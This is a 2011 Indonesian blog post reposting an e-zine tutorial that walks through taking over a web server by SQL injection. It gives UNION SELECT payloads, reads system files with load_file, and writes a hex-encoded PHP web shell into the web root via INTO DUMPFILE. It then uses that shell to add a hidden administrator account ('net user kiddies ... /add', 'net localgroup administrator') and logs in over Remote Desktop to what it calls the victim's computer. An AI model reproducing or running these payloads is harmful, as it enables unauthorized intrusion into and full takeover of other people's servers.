http://aux.iconpedia.net/uploads/10875870971013046993.pnghttp://aux.iconpedia.net/uploads/1540998406962263282.png !

Join The Community

Search

Juli 27, 2011

SQL RemoteDesktop

__     ___
  ____   _____   ____   _________      ___________   |__| __| _/
 /  _ \ /     \_/ __ \ / ___\__  \    /  _ \_  __ \  |  |/ __ | 
(  <_> )  Y Y  \  ___// /_/  > __ \_ (  <_> )  | \/  |  / /_/ | 
 \____/|__|_|  /\___  >___  (____  / /\____/|__|    /\__\____ | 
             \/     \/_____/     \/  \/             \/       \/ 
    
    
OMEGA|ZINE RELEASE
       02

Author: cloud || cloud13@gmail.com
Online @ www.omega.or.id :: http://ezine.omega.or.id

== SQL RemoteDesktop  ==


kalau misalkan ada yang salah silahkan di perbaiki
maklum aq juga lagi dalam tahap pembelajaran

#1
untuk langkah pertama, cari web target yang vuln dengan sql injection, kalo masalah
pencarian dan dork saya serahkan pada kalian dan bisa bertanya pada paman Google,

#2
setelah mendapatkan web yang vuln dengan SQL Injection, lalu kita cari alamat IP dari 
web tersebut (memudahkan kita dalam meremote dekstop,sebab dalam meremote,kita akan 
dimintai alamat IPnya)

#3
nah udah dapetkan alamat IP web yang bersangkutan, setelah itu cari kolom yang
bermasalahnya(Metode SQL Injection), misalkan kita dapet kolom 1

code:
192.168.0.1/index.php?=-1+union+select+1--

kemudian cari versinya

code:
192.168.0.1/index.php?=-1+union+select+version()--

disini saya baru melakukan pada SQL yang versi 5.x

#4
ganti kolom yang bermasalah dengan : 192.168.0.1/index.php?=-1+union+select+load_file('c:/boot.ini')--

perintah load_file('c:/boot.ini') digunakan untuk memanggil informasi boot dalam komputer korban


#5
setelah itu kita convert 

code:
<? php system($_get['CMD']) ?>

kedalam bentuk Ascii, saya sudah tahu pasti pada maleskan convertnya, kalo gitu saya kasih aja hasilnya

code:
0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d293b203f3e


#6
ok kalo gitu sekarang kita buat file cmd.php dengan syntak SQL

code:
192.168.0.1/index.php?=-1+union+select+0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d293b203f3​e+into+dumpfile+'c:/xampp/htdocs/cmd.php'--

0x3c3f7068702073797374656d28245f6765745b5c27434d445c275d293b203f3e >> conversian dari <? php system($_get['CMD']) ?>

+into+dumpfile+ >> untuk membuat file kedalam server

c:/xampp/htdocs/cmd.php >> dari pesan error SQL(tanda '\' diubah menjadi '/'), kalo dapet yang pk appserv maka C:/AppServ/www/cmd.php


#7
ubh URL menjadi

code:
192.168.0.1/cmd.php?cmd=dir

maka akan terlihat atau keluar data-data yang ada pada drive c:/ komputer korban

#8
nih code yang w rada kurang ngerti, coz w gak ngerti dari mana asalnya, tapi w paham codenya buat apa

ketikan pada URL : 192.168.0.1/cmd.php?cmd=net user kiddies 12345 /add

net user kiddies 12345 /add >> perintah diatas adalah untuk membuat username dan password 
baru dalam system komputer

code:
192.168.0.1/cmd.php?cmd=net localgroup administrator kiddies /add

net localgroup administrator kiddies /add >> perintah ini untuk membuat username kita adalah 
administrator dalam system komputer

#9
ketikan pertintah pada run >> mstsc 


#10
komputer sudah ditangan anda, silahkan pergunakan dengan sebaik-baiknya dan bijak....


 REFERENSI a.k.a bacaan :
 -ebook in my laptop :)
(Continue)..

0 komentar:

Posting Komentar